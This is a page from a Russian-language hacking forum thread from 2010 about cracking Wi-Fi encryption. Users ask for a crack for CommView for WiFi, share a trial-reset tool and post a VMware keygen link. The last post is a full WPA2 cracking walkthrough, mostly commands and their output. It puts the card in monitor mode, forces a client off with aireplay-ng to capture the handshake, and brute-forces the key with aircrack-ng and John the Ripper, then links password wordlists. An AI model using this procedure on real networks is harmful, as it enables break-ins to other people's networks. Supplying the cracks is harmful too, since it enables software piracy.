Форум camel-shoes.ru
18 Декабря 2010, 22:31:34 *
Добро пожаловать, Гость. Пожалуйста, войдите или зарегистрируйтесь.

Войти
Новости: SMF форум только что установлен!
 
  camel-shoes.ru   Начало   Помощь Поиск Войти Регистрация  
Страниц: 1 2 [3] 4
  Печать  
Автор Тема: тут файлы для взлома wep,wpa,wpa2(Изменил)  (Прочитано 8243 раз)
niku49
Новичок
*
Сообщений: 7


Просмотр профиля
« Ответ #30 : 26 Июля 2010, 20:15:01 »

         Приобрёл новый нотбук с внутренним адаптером  Intel(R)Wireless WiFi Link4965AGN.
         Этот адаптер совместим с прог.CommView for WiFi 6.2 или  .CommView for WiFi 6.3
          Программа    CommView for WiFi 6.3 работает отлично.Помогите найти сrack  k одной из этих прог.Буду очень признателен.
                                                   
                                                       
Записан
nik-semya
Пользователь
**
Сообщений: 76


Просмотр профиля
« Ответ #31 : 26 Июля 2010, 20:47:35 »

Пока только к версии 6.1 встречается лекарство, попробуй сделать так- установи версию 6.2 и пусть она тебе драйвера установит на карту, далее удали прогу, но дрова оставь, и потом ставь версию проги 6.1 патченую или 6.0 должна заработать с твоей картой после таких  манипуляций Подмигивающий
« Последнее редактирование: 26 Июля 2010, 21:01:29 от nik-semya » Записан
nik-semya
Пользователь
**
Сообщений: 76


Просмотр профиля
« Ответ #32 : 27 Июля 2010, 12:50:07 »

Вот тут и тут лежит прога для сброса триала (Ограничения на 30 дней) для всех версий Commview for WiFi (Проверено на Windows XP)
« Последнее редактирование: 05 Сентября 2010, 21:31:44 от nik-semya » Записан
niku49
Новичок
*
Сообщений: 7


Просмотр профиля
« Ответ #33 : 27 Июля 2010, 18:02:28 »

Ув. nik-semya подскажите пожалуйста (кратко),как пользоваться этой программой, вернее как убрать триал
Записан
nik-semya
Пользователь
**
Сообщений: 76


Просмотр профиля
« Ответ #34 : 27 Июля 2010, 21:04:12 »

Запускаешь и при первом ее запуске далее в окошке жми что то вроде I Agree или Ок и всё запускай коммвью, через 30 дней повтори процедуру
Записан
niku49
Новичок
*
Сообщений: 7


Просмотр профиля
« Ответ #35 : 28 Июля 2010, 22:47:12 »

Скачал эту прогу по продлению триала  но  к сожалению у меня она не пошла.На компе стоит виндос 7.
Однако ,если прога и сработало-бы, она не решило проблему так,как оценочная версия СоmmView for WiFi  позволяет записать  не более
20 тыс. пакетов.В инете встречал инфо ,что якобы существует кряк на СоmmView for WiFi версия 6.2
Записан
nik-semya
Пользователь
**
Сообщений: 76


Просмотр профиля
« Ответ #36 : 29 Июля 2010, 00:35:34 »

Может и есть но я не нашел кроме этого ничего Непонимающий
Записан
nik-semya
Пользователь
**
Сообщений: 76


Просмотр профиля
« Ответ #37 : 01 Августа 2010, 21:29:41 »

WinAircrack русифицированный тут
Записан
nik-semya
Пользователь
**
Сообщений: 76


Просмотр профиля
« Ответ #38 : 05 Августа 2010, 07:39:21 »

Народ кому надо держите русификатор для AiroWizard тут, кидайте его в папку с прогой и соглашайтесь на замену
« Последнее редактирование: 03 Сентября 2010, 23:52:46 от nik-semya » Записан
Rhydaydot
Новичок
*
Сообщений: 7

[url=http://services.my-addr.com/verify-email-list-online.php]email list verification[/url]

138681215quanahirvinenf15@gmail.com
Просмотр профиля
« Ответ #39 : 07 Августа 2010, 09:45:40 »

-XXXXXX-, как ты можеш утверждать что твоя программа более расширеная, если не знаеш какую юзаю я? это не трой случайно?
Записан

group email verify
Zabava23
Новичок
*
Сообщений: 1


Просмотр профиля
« Ответ #40 : 12 Августа 2010, 14:31:59 »

Всем привет може кто выложит повторно? А то куда то загрузка битая , а загрузчик куда то пропал ! последуйте моему мануалу http://turbobit.net/rsg4k4bd39hq.html
Записан
randomizr
Новичок
*
Сообщений: 4

true terrorist

198483414dreamlanders@mail.ru
Просмотр профиля WWW
« Ответ #41 : 29 Августа 2010, 16:13:32 »

clone cd порит болвани только так.Теперь использую imgburn если что-то не то она сразу пишет и болвань не поганит
Записан


Мой сайт с учебными материалами.
kozel747
Новичок
*
Сообщений: 43


Просмотр профиля
« Ответ #42 : 18 Ноября 2010, 13:47:01 »

кому напряжно пользоваться программами для взлома АП купитеhttp://www.wifirobin.com/free-network  правда ломает только wep зато никаких заморочек никаких программ утанавливать не нужно(купил ,опробовал,всё работает как и утверждают проиводители)но мне интереснее самому.кто купит спрашивайте что и  как ,сейчас сижу курочу эту штуку может что-то ещё вытащу.
Записан
kozel747
Новичок
*
Сообщений: 43


Просмотр профиля
« Ответ #43 : 27 Ноября 2010, 00:34:45 »

вот вам live-cd всего 45мб всё что нужно для взлома wi-fi никаких команд вводить не нужно,щёлкайте мышкой где нужно и всё, в архиве видео как им пользоваться.
Commview рядом не стоял по сравнению с этим , поверьте.запишите образ на болванку или запускайте с VMware как я.   http://turbobit.net/quet9unne87z.html                                                                                                                           да кто хочет  VMware скачайте с оф.сайта а здесь кейген http://turbobit.net/mzlyk75d1dfe.html
Записан
kozel747
Новичок
*
Сообщений: 43


Просмотр профиля
« Ответ #44 : 28 Ноября 2010, 00:18:22 »

взлом WPA.


Я буду использовать Dlink DWL-G122 (USB), беспроводной сетевой интерфейс для этой процедуры. В backtrack4, это устройство признано wlan0.

Во-первых, поставить карту в режиме мониторинга:

...............................................................

root@bt:~# airmon-ng

Interface       Chipset         Driver

wifi0           Atheros         madwifi-ng
ath0            Atheros         madwifi-ng VAP (parent: wifi0)
ath1            Atheros         madwifi-ng VAP (parent: wifi0)
wlan0           Ralink 2573 USB rt73usb - [phy0]

...............................................................
root@bt:~# airmon-ng start wlan0

Interface       Chipset         Driver

wifi0           Atheros         madwifi-ng
ath0            Atheros         madwifi-ng VAP (parent: wifi0)
ath1            Atheros         madwifi-ng VAP (parent: wifi0)
wlan0           Ralink 2573 USB rt73usb - [phy0]
                                (monitor mode enabled on mon0)
................................................................

Хорошо, теперь мы можем использовать интерфейс mon0

Давайте найдём беспроводную сеть, которая использует WPA2 / PSK

.................................................................

root@bt:~# airodump-ng mon0

 CH  6 ][ Elapsed: 4 s ][ 2009-02-21 12:57                                         

 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID                                                   

 00:19:5B:52:AD:F7  -33        5        0    0  10  54   WPA2 CCMP   PSK  TestNet                                                 

 BSSID              STATION            PWR   Rate   Lost  Packets  Probe                                                           

 00:19:5B:52:AD:F7  00:1C:BF:90:5B:A3  -29   0- 1     12        4  TestNet

.....................................................................

Остановим airodump-ng (ctrl+c) и запустим его снова,что-бы записать все пакеты на диск

.....................................................................

airodump-ng mon0 --channel 10 --bssid 00:19:5B:52:AD:F7 -w /tmp/wpa2

........................................................................


На данный момент, у вас есть 2 варианта: либо ждать, пока клиент подключится и 4-handshake будет полным, или deauthenticate существующих клиентов и таким образом заставить AP reassociate. Время-деньги, так что давайте заставим силой deauthenticate. Мы должны запустить aireplay-ng введя BSSID ЗС (-а) и МАС подключенного клиента (-с)

.........................................................................

root@bt:~# aireplay-ng -0 1 -a 00:19:5B:52:AD:F7 -c 00:1C:BF:90:5B:A3 mon0

13:04:19  Waiting for beacon frame (BSSID: 00:19:5B:52:AD:F7) on channel 10

13:04:20  Sending 64 directed DeAuth. STMAC: [00:1C:BF:90:5B:A3] [67|66 ACKs]

.............................................................................

Как результат, airodump-ng укажeт "WPA Handshake:" в верхнем правом углу

..............................................................................

 CH 10 ][ Elapsed: 2 mins ][ 2009-02-21 13:04 ][ WPA handshake: 00:19:5B:52:AD:F7                                         

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID                                               

 00:19:5B:52:AD:F7  -33 100     1338       99    0  10  54   WPA2 CCMP   PSK  TestNet                                             

 BSSID              STATION            PWR   Rate   Lost  Packets  Probe                                                           

 00:19:5B:52:AD:F7  00:1C:BF:90:5B:A3  -27  54-54      0      230

................................................................................


Остановитe airodump-ng и убедитесь, что файлы были созданы правильно

...............................................................................

root@bt:/# ls /tmp/wpa2* -al

-rw-r--r-- 1 root root 35189 2009-02-21 13:04 /tmp/wpa2-01.cap

-rw-r--r-- 1 root root   476 2009-02-21 13:04 /tmp/wpa2-01.csv

-rw-r--r-- 1 root root   590 2009-02-21 13:04 /tmp/wpa2-01.kismet.csv

................................................................................

 Есть 2 способа bruteforcing: один, который относительно быстр, но не гарантирует успеха и тот, который идет очень медленно, но гарантирует, что вы найдете ключ через определенный момент времени.

 Первый вариант является использованием рабочего списка / dictionary file. Многие из этих файлов можно найти в Интернете, либо могут быть получены с помощью таких инструментов, как John the Ripper. Как только список слов будет создан, все что вам нужно сделать, это запустить Aircrack-ng подставив файл с Handshake и словарь word.txt

................................................................................

aircrack-ng –w /tmp/wordlists/word.lst -b 00:19:5B:52:AD:F7 /tmp/wpa2*.cap

--------------------------------------------------------------------------------

Второй метод (bruteforcing) будет успешным наверняка, но это может занять много времени , чтобы закончить. Имейте в виду, WPA2 ключ может быть до 64 символов, так что в теории что-бы построить все сочетания паролей со всеми возможными наборами символов и скормить их в Aircrack займёт много времени. Если вы хотите использовать John The Ripper для создания всех возможных комбинаций паролей и скормить их в Aircrack-NG, это команда для использования:

..................................................................................

root@bt:~# /pentest/password/jtr/john --stdout --incremental:all | aircrack-ng -b 00:19:5B:52:AD:F7 -w - /tmp/wpa2*.cap

.................................................................................

каждый символ в ключе может иметь 26 +26 +10 (62) возможных комбинаций. Так максимальное число комбинаций, которое должно быть проверено в процессе перебора 62 * 62 * 62 * 62 * 62 * 62 * 62 * 62 = 218 340 105 584 896 около 600 ключей в секунду на моем "медленном" аппарате, может занять более 101083382 часов, чтобы найти ключ (11539 года). Так что думайте об этом, когда ломаете WPA


----------------------------------------------------------------------------------------------------------------
вот вам в помощь несколько словарей

ComboFile   http://turbobit.net/m15prul3v4vt.html

de-ice.net-1.110-1.0  http://turbobit.net/8jsypdjdkctf.html

de-ice.net-1.100-1.1  http://turbobit.net/ej38m25xhrmt.html

de-ice.net-2.100-1.1.part1  http://turbobit.net/0g2yjp1y77df.html

de-ice.net-2.100-1.1.part2  http://turbobit.net/7cbyz8sxarh7.html

роутеры и модемы Password List 2010-02-04  http://turbobit.net/fomdazyfg5ou.html

theargonlistver1  http://turbobit.net/kjf1h2eoyb46.html

webster-dictionary  http://turbobit.net/2xhh12xca0cy.html

wpalist  http://turbobit.net/700uk6nvpren.html







Записан
Страниц: 1 2 [3] 4
  Печать  
 
Перейти в:  

Powered by MySQLPowered by PHP Powered by SMF 1.1.11 | SMF © 2006-2008, Simple Machines LLC
Valid XHTML 1.0!Valid CSS!
Яндекс.Метрика